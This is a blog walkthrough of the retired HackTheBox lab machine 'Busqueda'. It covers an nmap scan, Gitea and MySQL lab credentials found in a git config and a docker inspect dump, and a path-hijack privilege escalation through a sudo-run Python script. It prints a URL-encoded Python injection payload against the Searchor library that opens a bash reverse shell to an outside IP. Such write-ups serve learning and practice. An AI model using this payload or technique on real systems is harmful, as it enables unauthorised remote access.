Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Busqueda
|htbmachinesretired|

Initial Enumeration

Port Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Nmap 7.93 scan initiated Sun Apr  9 06:00:10 2023 as: nmap -sC -sV -oN nmap/busqueda 10.129.199.50
Nmap scan report for busqueda.htb (10.129.199.50)
Host is up (0.27s latency).
Scanned at 2023-04-09 06:00:11 IST for 41s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
|   256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open  http    Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr  9 06:00:52 2023 -- 1 IP address (1 host up) scanned in 41.19 seconds

Web Service

Opening the page we see

From the footer we find a project link
https://github.com/ArjunSharda/Searchor

Saw a issue in the lib as https://github.com/ArjunSharda/Searchor/pull/130

With lot of trial and thought got the payload working

and with this got a shell as svc

1
engine=Google&query=hello')%2bstr(__import__("os").system("bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.26/1337+0>%261'"))%23

Privilege escalation

1
http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

Using the password with svc we see we can run

Using the password on gitea container we can get the config of the dockerfile which expose the mysql db creds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
{
    "Hostname": "960873171e2e",
    "Domainname": "",
    "User": "",
    "AttachStdin": false,
    "AttachStdout": false,
    "AttachStderr": false,
    "ExposedPorts": {
        "22/tcp": {},
        "3000/tcp": {}
    },
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
        "USER_UID=115",
        "USER_GID=121",
        "GITEA__database__DB_TYPE=mysql",
        "GITEA__database__HOST=db:3306",
        "GITEA__database__NAME=gitea",
        "GITEA__database__USER=gitea",
        "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
        "USER=git",
        "GITEA_CUSTOM=/data/gitea"
    ],
    "Cmd": [
        "/bin/s6-svscan",
        "/etc/s6"
    ],
    "Image": "gitea/gitea:latest",
    "Volumes": {
        "/data": {},
        "/etc/localtime": {},
        "/etc/timezone": {}
    },
    "WorkingDir": "",
    "Entrypoint": [
        "/usr/bin/entrypoint"
    ],
    "OnBuild": null,
    "Labels": {
        "com.docker.compose.config-hash": "e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515",
        "com.docker.compose.container-number": "1",
        "com.docker.compose.oneoff": "False",
        "com.docker.compose.project": "docker",
        "com.docker.compose.project.config_files": "docker-compose.yml",
        "com.docker.compose.project.working_dir": "/root/scripts/docker",
        "com.docker.compose.service": "server",
        "com.docker.compose.version": "1.29.2",
        "maintainer": "maintainers@gitea.io",
        "org.opencontainers.image.created": "2022-11-24T13:22:00Z",
        "org.opencontainers.image.revision": "9bccc60cf51f3b4070f5506b042a3d9a1442c73d",
        "org.opencontainers.image.source": "https://github.com/go-gitea/gitea.git",
        "org.opencontainers.image.url": "https://github.com/go-gitea/gitea"
    }
}

Same creds can be used on gitea to login as administator

Running the script in /opt/script with full-checkup option run successfully

but running the same on svc home directory we get something went wrong.

Checking the source code we see it is failing because it is looking for full-checkup.sh in the current directory.

creating a full-checkup.sh in the current directory and adding a reverse shell in that and chmoding the script.

and then running the same /opt/scripts/system-checkup.py full-checkup

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/busqueda/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxeasy